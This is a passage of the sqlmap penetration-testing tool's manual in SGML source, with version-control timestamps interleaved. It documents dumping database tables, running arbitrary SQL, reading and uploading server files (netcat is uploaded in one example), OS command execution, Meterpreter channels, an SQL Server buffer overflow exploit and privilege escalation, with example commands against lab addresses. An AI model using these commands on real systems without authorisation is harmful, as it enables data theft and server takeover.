Switches: <tt>-</tt><tt>-dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
<tt>-</tt><tt>-start</tt>, <tt>-</tt><tt>-stop</tt>, <tt>-</tt><tt>-first</tt>
and <tt>-</tt><tt>-last</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to a specific database's table it is
possible to dump the table entries.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
This functionality depends on switch <tt>-T</tt> to specify the table
name and optionally on switch <tt>-D</tt> to specify the database name.
If the table name is provided, but the database name is not, the current
database name is used.
2008-10-15 19:38:22 +04:00
2008-12-17 23:17:34 +03:00
<p>
2011-02-27 15:19:32 +03:00
Example against a Firebird target:
2008-12-17 23:17:34 +03:00
<tscreen><verb>
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
2008-12-17 23:17:34 +03:00
[...]
2011-02-27 15:19:32 +03:00
Database: Firebird_masterdb
Table: USERS
2010-03-03 21:58:27 +03:00
[4 entries]
+----+--------+------------+
2011-02-27 15:19:32 +03:00
| ID | NAME | SURNAME |
2010-03-03 21:58:27 +03:00
+----+--------+------------+
2011-02-27 15:19:32 +03:00
| 1 | luther | blisset |
2010-03-03 21:58:27 +03:00
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+----+--------+------------+
2008-10-15 19:38:22 +04:00
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
You can also provide a comma-separated list of the specific columns to
dump with the <tt>-C</tt> switch.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
sqlmap also generates for each table dumped the entries in a CSV format
textual file.
You can see the absolute path where sqlmap creates the file by providing a
verbosity level greater than or equal to <bf>1</bf>.
2008-10-15 19:38:22 +04:00
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
If you want to dump only a range of entries, then you can provide switches
<tt>-</tt><tt>-start</tt> and/or <tt>-</tt><tt>-stop</tt> to respectively
start to dump from a certain entry and stop the dump at a certain entry.
For instance, if you want to dump only the first entry, provide
<tt>-</tt><tt>-stop 1</tt> in your command line. Vice versa if, for
instance, you want to dump only the second and third entry, provide
<tt>-</tt><tt>-start 1</tt> <tt>-</tt><tt>-stop 3</tt>.
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is also possible to specify which single character or range of characters
to dump with switches <tt>-</tt><tt>-first</tt> and <tt>-</tt><tt>-last</tt>.
For instance, if you want to dump columns' entries from the third to the
fifth character, provide <tt>-</tt><tt>-first 3</tt> <tt>-</tt><tt>-last
5</tt>.
This feature only applies to the blind SQL injection techniques because for
error-based and UNION query SQL injection techniques the number of requests
is exactly the same, regardless of the length of the column's entry output
to dump.
2008-10-20 17:43:18 +04:00
<p>
2011-02-27 15:19:32 +03:00
As you know by down, sqlmap is <bf>flexible</bf>. You can leave it to
automatically enumerate the whole database table or you can be very
precise in which characters to dump, from which columns and which range of
entries.
2008-10-20 17:43:18 +04:00
2008-10-15 19:38:22 +04:00
<sect2>Dump all databases tables entries
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-dump-all</tt> and <tt>-</tt><tt>-exclude-sysdbs</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to dump all databases tables entries at once that the
session user has read access on.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
You can also provide the <tt>-</tt><tt>-exclude-sysdbs</tt> switch to
exclude all system databases. In that case sqlmap will only dump entries
of users' databases tables.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Note that on Microsoft SQL Server the <tt>master</tt> database is not
considered a system database because some database administrators use it
as a users' database.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Search for columns, tables or databases
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
Switches: <tt>-</tt><tt>-search</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Run custom SQL statement
2008-12-21 19:35:45 +03:00
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
The SQL query and the SQL shell features allow to run arbitrary SQL
statements on the database management system.
2010-03-04 01:02:48 +03:00
sqlmap automatically dissects the provided statement, determines which
2011-02-27 15:19:32 +03:00
technique is appropriate to use to inject it and how to pack the SQL
payload accordingly.
2010-03-04 01:02:48 +03:00
2011-02-27 15:19:32 +03:00
<p>
If the query is a <tt>SELECT</tt> statement, sqlmap will retrieve its
output.
Otherwise it will execute the query through the stacked query SQL
injection technique if the web application supports multiple statements on
the back-end database management system.
Beware that some web application technologies do not support stacked
queries on specific database management systems. For instance, PHP does
not support stacked queries when the back-end DBMS is MySQL, but it does
support when the back-end DBMS is PostgreSQL.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Examples against a Microsoft SQL Server 2000 target:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-07 03:55:10 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
2008-10-15 19:38:22 +04:00
"SELECT 'foo'" -v 1
[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo': 'foo'
2011-02-07 03:55:10 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
2010-03-03 21:58:27 +03:00
"SELECT 'foo', 'bar'" -v 2
2008-10-15 19:38:22 +04:00
[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
distinct queries to be able to retrieve the output even if we are going blind
2010-03-03 21:58:27 +03:00
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
2008-10-15 19:38:22 +04:00
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
2010-03-03 21:58:27 +03:00
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
2008-10-15 19:38:22 +04:00
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
2010-03-03 21:58:27 +03:00
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
2008-10-15 19:38:22 +04:00
SELECT 'foo', 'bar': 'foo, bar'
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
As you can see, sqlmap splits the provided query into two different
<tt>SELECT</tt> statements then retrieves the output for each separate
query.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
If the provided query is a <tt>SELECT</tt> statement and contains a
<tt>FROM</tt> clause, sqlmap will ask you if such statement can return
multiple entries. In that case the tool knows how to unpack the query
correctly to count the number of possible entries and retrieve its output,
entry per entry.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
The SQL shell option allows you to run your own SQL statement
interactively, like a SQL console connected to the database management
system.
This feature provides TAB completion and history support too.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect1>Brute force
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
These options can be used to run brute force checks.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Brute force tables names
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-common-tables</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Brute force columns names
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-common-columns</tt>
2008-10-15 19:38:22 +04:00
2009-02-01 03:20:08 +03:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2009-02-01 03:20:08 +03:00
2009-02-01 16:44:44 +03:00
2011-02-27 15:19:32 +03:00
<sect1>User-defined function injection
2009-02-03 18:38:40 +03:00
<p>
2011-02-27 15:19:32 +03:00
These options can be used to create custom user-defined functions.
2010-03-02 15:07:54 +03:00
2010-03-04 01:02:48 +03:00
<sect2>Inject custom user-defined functions (UDF)
2010-03-02 15:07:54 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-udf-inject</tt> and <tt>-</tt><tt>-shared-lib</tt>
2010-03-02 15:07:54 +03:00
2010-03-12 20:43:38 +03:00
<p>
You can inject your own user-defined functions (UDFs) by compiling a
MySQL or PostgreSQL shared library, DLL for Windows and shared object for
Linux/Unix, then provide sqlmap with the path where the shared library
is stored locally on your machine. sqlmap will then ask you some
questions, upload the shared library on the database server file system,
create the user-defined function(s) from it and, depending on your
options, execute them. When you are finished using the injected UDFs,
sqlmap can also remove them from the database for you.
<p>
2011-02-27 15:19:32 +03:00
These techniques are detailed in the white paper
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
name="Advanced SQL injection to operating system full control">.
<p>
2011-02-28 19:14:09 +03:00
Use switch <tt>-</tt><tt>-udf-inject</tt> and follow the instructions.
2010-03-12 20:43:38 +03:00
<p>
If you want, you can specify the shared library local file system path
2011-02-28 19:14:09 +03:00
via command line too by using <tt>-</tt><tt>-shared-lib</tt> option. Vice
versa sqlmap will ask you for the path at runtime.
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<p>
This feature is available only when the database management system is
MySQL or PostgreSQL.
2008-10-15 19:38:22 +04:00
<sect1>File system access
2010-03-04 01:02:48 +03:00
<sect2>Read a file from the database server's file system
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-file-read</tt>
2008-10-15 19:38:22 +04:00
<p>
2009-07-25 04:25:59 +04:00
It is possible to retrieve the content of files from the underlying file
2009-07-25 18:31:44 +04:00
system when the back-end database management system is either MySQL,
2010-02-08 12:10:32 +03:00
PostgreSQL or Microsoft SQL Server, and the session user has the needed
2009-07-25 18:31:44 +04:00
privileges to abuse database specific functionalities and architectural
weaknesses.
2011-02-27 15:19:32 +03:00
The file specified can be either a textual or a binary file. sqlmap will
handle it properly.
2009-07-25 04:25:59 +04:00
<p>
2010-03-12 20:43:38 +03:00
These techniques are detailed in the white paper
2011-02-27 15:19:32 +03:00
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
2010-03-12 20:43:38 +03:00
name="Advanced SQL injection to operating system full control">.
2009-07-25 04:25:59 +04:00
<p>
2011-02-27 15:19:32 +03:00
Example against a Microsoft SQL Server 2005 target to retrieve a binary
file:
2009-07-25 18:31:44 +04:00
<tscreen><verb>
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
2011-02-27 15:19:32 +03:00
--file-read "C:/example.exe" -v 1
2009-07-25 18:31:44 +04:00
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
2011-02-27 15:19:32 +03:00
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
2011-02-28 19:14:09 +03:00
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
2011-02-27 15:19:32 +03:00
[...]
2009-07-25 18:31:44 +04:00
2011-02-28 19:14:09 +03:00
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
2009-07-25 18:31:44 +04:00
2011-02-28 19:14:09 +03:00
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
2011-02-27 15:19:32 +03:00
80386 32-bit
2009-07-25 18:31:44 +04:00
</verb></tscreen>
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Upload a file to the database server's file system
2008-10-15 19:38:22 +04:00
2009-04-22 15:48:07 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-file-write</tt> and <tt>-</tt><tt>-file-dest</tt>
2009-04-22 15:48:07 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to upload a local file to the database server's file system
2010-03-12 20:43:38 +03:00
when the back-end database management system is either MySQL, PostgreSQL
or Microsoft SQL Server, and the session user has the needed privileges to
2009-07-25 18:31:44 +04:00
abuse database specific functionalities and architectural weaknesses.
2011-02-27 15:19:32 +03:00
The file specified can be either a textual or a binary file. sqlmap will
handle it properly.
2009-07-25 04:25:59 +04:00
<p>
2010-03-12 20:43:38 +03:00
These techniques are detailed in the white paper
2011-02-27 15:19:32 +03:00
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
2010-03-12 20:43:38 +03:00
name="Advanced SQL injection to operating system full control">.
2009-07-25 04:25:59 +04:00
<p>
2011-02-27 15:19:32 +03:00
Example against a MySQL target to upload a binary UPX-compressed file:
2009-07-25 04:25:59 +04:00
<tscreen><verb>
2009-07-25 18:31:44 +04:00
$ file /tmp/nc.exe.packed
/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /tmp/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
2011-02-27 15:19:32 +03:00
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
2009-07-25 04:25:59 +04:00
[...]
2009-07-25 18:31:44 +04:00
[hh:mm:29] [INFO] the back-end DBMS is MySQL
2009-07-25 04:25:59 +04:00
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
2011-02-27 15:19:32 +03:00
[...]
2009-07-25 04:25:59 +04:00
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
2009-07-25 18:31:44 +04:00
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/tmp/nc.exe.packed'
2011-02-27 15:19:32 +03:00
</verb></tscreen>
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<sect1>Operating system takeover
2009-04-22 15:48:07 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Run arbitrary operating system command
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-os-cmd</tt> and <tt>-</tt><tt>-os-shell</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to <bf>run arbitrary commands on the database server's
underlying operating system</bf> when the back-end database management
system is either MySQL, PostgreSQL or Microsoft SQL Server, and the
session user has the needed privileges to abuse database specific
functionalities and architectural weaknesses.
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<p>
On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
explained above) a shared library (binary file) containing two
user-defined functions, <tt>sys_exec()</tt> and <tt>sys_eval()</tt>, then
it creates these two functions on the database and calls one of them to
execute the specified command, depending on user's choice to display the
standard output or not.
On Microsoft SQL Server, sqlmap abuses the <tt>xp_cmdshell</tt> stored
procedure: if it is disabled (by default on Microsoft SQL Server >= 2005),
sqlmap re-enables it; if it does not exist, sqlmap creates it from
scratch.
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<p>
When the user requests the standard output, sqlmap uses one of the
enumeration SQL injection techniques (blind, inband or error-based) to
retrieve it. Vice versa, if the standard output is not required, stacked
query SQL injection technique is used to execute the command.
2009-07-25 18:31:44 +04:00
2011-02-27 15:19:32 +03:00
<p>
These techniques are detailed in the white paper
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
name="Advanced SQL injection to operating system full control">.
2009-07-25 04:25:59 +04:00
<p>
2011-02-27 15:19:32 +03:00
Example against a PostgreSQL target:
2009-07-25 18:31:44 +04:00
<tscreen><verb>
2011-02-27 15:19:32 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1
2009-07-25 18:31:44 +04:00
[...]
2011-02-27 15:19:32 +03:00
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
only be deleted manually
2009-07-25 18:31:44 +04:00
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
It is also possible to simulate a real shell where you can type as many
arbitrary commands as you wish. The option is <tt>-</tt><tt>-os-shell</tt> and has
the same TAB completion and history functionalities that
<tt>-</tt><tt>-sql-shell</tt> has.
<p>
Where stacked queries has not been identified on the web application
(e.g. PHP or ASP with back-end database management system being MySQL) and
the DBMS is MySQL, it is still possible to abuse the <tt>SELECT</tt>
clause's <tt>INTO OUTFILE</tt> to create a web backdoor in a writable
folder within the web server document root and still get command
execution assuming the back-end DBMS and the web server are hosted on the
same server.
sqlmap supports this technique and allows the user to provide a
comma-separated list of possible document root sub-folders where try to
upload the web file stager and the subsequent web backdoor. Also, sqlmap
has its own tested web file stagers and backdoors for the following
languages:
<itemize>
<item>ASP
<item>ASP.NET
<item>JSP
<item>PHP
</itemize>
2009-04-22 15:48:07 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Out-of-band stateful connection: Meterpreter & friends
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-os-pwn</tt>, <tt>-</tt><tt>-os-smbrelay</tt>,
<tt>-</tt><tt>-os-bof</tt>, <tt>-</tt><tt>-priv-esc</tt>,
<tt>-</tt><tt>-msf-path</tt> and <tt>-</tt><tt>-tmp-path</tt>
2008-10-15 19:38:22 +04:00
2009-04-22 15:48:07 +04:00
<p>
2010-03-12 20:43:38 +03:00
It is possible to establish an <bf>out-of-band stateful TCP connection
2011-02-27 15:19:32 +03:00
between the attacker machine and the database server</bf> underlying
operating system when the back-end database management system is either
MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the
needed privileges to abuse database specific functionalities and
architectural weaknesses.
This channel can be an interactive command prompt, a Meterpreter session
or a graphical user interface (VNC) session as per user's choice.
<p>
2010-03-12 20:43:38 +03:00
sqlmap relies on Metasploit to create the shellcode and implements four
different techniques to execute it on the database server. These
techniques are:
<itemize>
<item>Database <bf>in-memory execution of the Metasploit's shellcode</bf>
via sqlmap own user-defined function <tt>sys_bineval()</tt>. Supported on
2011-02-27 15:19:32 +03:00
MySQL and PostgreSQL - switch <tt>-</tt><tt>-os-pwn</tt>.
2010-03-12 20:43:38 +03:00
<item>Upload and execution of a Metasploit's <bf>stand-alone payload
stager</bf> via sqlmap own user-defined function <tt>sys_exec()</tt> on
MySQL and PostgreSQL or via <tt>xp_cmdshell()</tt> on Microsoft SQL
2011-02-27 15:19:32 +03:00
Server - switch <tt>-</tt><tt>-os-pwn</tt>.
2010-03-12 20:43:38 +03:00
<item>Execution of Metasploit's shellcode by performing a <bf>SMB
reflection attack</bf> (<htmlurl
url="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"
name="MS08-068">) with a UNC path request from the database server to
2011-02-27 15:19:32 +03:00
the attacker's machine where the Metasploit <tt>smb_relay</tt> server
exploit listens. Supported when running sqlmap with high privileges
(<tt>uid=0</tt>) on Linux/Unix and the target DBMS runs as Administrator
on Windows - switch <tt>-</tt><tt>-os-smbrelay</tt>.
2010-03-12 20:43:38 +03:00
<item>Database in-memory execution of the Metasploit's shellcode by
exploiting <bf>Microsoft SQL Server 2000 and 2005
<tt>sp_replwritetovarbin</tt> stored procedure heap-based buffer
overflow</bf> (<htmlurl
url="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx"
2011-02-27 15:19:32 +03:00
name="MS09-004">). sqlmap has its own exploit to trigger the
vulnerability with automatic DEP memory protection bypass, but it relies
on Metasploit to generate the shellcode to get executed upon successful
exploitation - switch <tt>-</tt><tt>-os-bof</tt>.
2010-03-12 20:43:38 +03:00
</itemize>
2009-07-25 18:31:44 +04:00
2009-07-25 04:25:59 +04:00
<p>
2010-03-12 20:43:38 +03:00
These techniques are detailed in the white paper
2011-02-27 15:19:32 +03:00
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
2010-03-12 20:43:38 +03:00
name="Advanced SQL injection to operating system full control"> and in the
slide deck <htmlurl url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database"
name="Expanding the control over the operating system from the database">.
2009-04-22 15:48:07 +04:00
2009-07-25 18:31:44 +04:00
<p>
2011-02-27 15:19:32 +03:00
Example against a MySQL target:
2009-07-25 18:31:44 +04:00
<tscreen><verb>
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
2011-02-27 15:19:32 +03:00
--os-pwn -v 1 --msf-path /tmp/metasploit
2009-07-25 18:31:44 +04:00
[...]
2011-02-27 15:19:32 +03:00
TODO
2009-07-25 18:31:44 +04:00
</verb></tscreen>
<p>
By default MySQL on Windows runs as <tt>SYSTEM</tt>, however PostgreSQL
2010-03-12 20:43:38 +03:00
runs as a low-privileged user <tt>postgres</tt> on both Windows and Linux.
2009-07-25 18:31:44 +04:00
Microsoft SQL Server 2000 by default runs as <tt>SYSTEM</tt>, whereas
Microsoft SQL Server 2005 and 2008 run most of the times as <tt>NETWORK
SERVICE</tt> and sometimes as <tt>LOCAL SERVICE</tt>.
2011-02-27 15:19:32 +03:00
<p>
2010-03-12 20:43:38 +03:00
It is possible to provide sqlmap with the <tt>-</tt><tt>-priv-esc</tt>
2011-02-27 15:19:32 +03:00
switch to perform a <bf>database process' user privilege escalation</bf>
2010-03-12 20:43:38 +03:00
via Metasploit's <tt>getsystem</tt> command which include, among others,
the <htmlurl
url="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"
name="kitrap0d"> technique (<htmlurl
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
2011-02-27 15:19:32 +03:00
name="MS10-015">).
2009-07-25 18:31:44 +04:00
2008-10-15 19:38:22 +04:00
2010-03-02 15:07:54 +03:00
<sect1>Windows registry access
2010-03-13 17:35:56 +03:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to access Windows registry when the back-end database
management system is either MySQL, PostgreSQL or Microsoft SQL Server,
and when the web application supports stacked queries. Also, session user
has to have the needed privileges to access it.
2010-03-13 17:35:56 +03:00
2010-03-02 15:07:54 +03:00
<sect2>Read a Windows registry key value
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-reg-read</tt>
2010-03-12 20:43:38 +03:00
<p>
2010-03-13 17:35:56 +03:00
Using this option you can read registry key values.
2010-03-02 15:07:54 +03:00
2010-03-13 17:35:56 +03:00
<sect2>Write a Windows registry key value
2010-03-02 15:07:54 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-reg-add</tt>
2010-03-12 20:43:38 +03:00
<p>
2010-03-13 17:35:56 +03:00
Using this option you can write registry key values.
2010-03-02 15:07:54 +03:00
2010-03-13 17:35:56 +03:00
<sect2>Delete a Windows registry key
2010-03-02 15:07:54 +03:00
2010-03-13 17:35:56 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-reg-del</tt>
2010-03-02 15:07:54 +03:00
<p>
2010-03-13 17:35:56 +03:00
Using this option you can delete registry keys.
2010-03-12 20:43:38 +03:00
2010-03-13 17:35:56 +03:00
<sect2>Auxiliary registry switches
2010-03-12 20:43:38 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-reg-key</tt>, <tt>-</tt><tt>-reg-value</tt>,
2010-03-13 17:35:56 +03:00
<tt>-</tt><tt>-reg-data</tt> and <tt>-</tt><tt>-reg-type</tt>
2010-03-02 15:07:54 +03:00
2010-03-13 17:35:56 +03:00
<p>
These switches can be used to provide data needed for proper running of
options <tt>-</tt><tt>-reg-read</tt>, <tt>-</tt><tt>-reg-add</tt> and
<tt>-</tt><tt>-reg-del</tt>. So, instead of providing registry key
information when asked, you can use them at command prompt as program
arguments.
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
With <tt>-</tt><tt>-reg-key</tt> option you specify used Windows registry
key path, with <tt>-</tt><tt>-reg-value</tt> value item name inside
provided key, with <tt>-</tt><tt>-reg-data</tt> value data, while with
<tt>-</tt><tt>-reg-type</tt> option you specify type of the value item.
2010-03-12 20:43:38 +03:00
<p>
2011-02-27 15:19:32 +03:00
A sample command line for adding a registry key hive follows:
2010-03-02 15:07:54 +03:00
2010-03-13 17:35:56 +03:00
<tscreen><verb>
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
2011-02-27 15:19:32 +03:00
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
2010-03-13 17:35:56 +03:00
</verb></tscreen>
2010-03-02 15:07:54 +03:00
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect1>General
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2010-03-02 15:07:54 +03:00
2010-03-12 20:43:38 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-t</tt>
2010-03-12 20:43:38 +03:00
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Session file: save and resume data retrieved
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-s</tt>
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<p>
By default sqlmap logs all queries and their output into a textual file
called <em>session file</em>, regardless of the technique used to extract
the data.
This is useful if you stop the injection for any reason and rerun it
afterwards: sqlmap will parse the session file and resume enumerated data
from it, then carry on extracting data from the exact point where it left
before you stopped the tool.
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
The default session file is <tt>output/TARGET_URL/session</tt>, but you
can specify a different file path with <tt>-s</tt> switch.
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
The session file has the following structure:
2010-03-02 15:07:54 +03:00
<tscreen><verb>
[hh:mm:ss MM/DD/YY]
[Target URL][Injection point][Parameters][Query or information name][Query output or value]
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
A more user friendly textual file where all data retrieved is saved, is
the <em>log file</em>, <tt>output/TARGET_URL/log</tt>. This file can be
useful to see all information enumerated to the end.
2010-03-02 15:07:54 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Flush session file
2010-03-04 16:17:11 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-flush-session</tt>
2010-03-04 16:17:11 +03:00
<p>
2010-03-12 20:43:38 +03:00
As you are already familiar with the concept of a session file from the
2011-02-27 15:19:32 +03:00
description above, it is good to know that you can flush the content of
that file using option <tt>-</tt><tt>-flush-session</tt>.
This way you can avoid the caching mechanisms implemented by default in
sqlmap. Other possible way is to manually remove the session file(s).
2010-03-04 16:17:11 +03:00
2008-10-15 19:38:22 +04:00
<sect2>Estimated time of arrival
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-eta</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to calculate and show in real time the estimated time of
arrival to retrieve each query output. This is shown when the technique
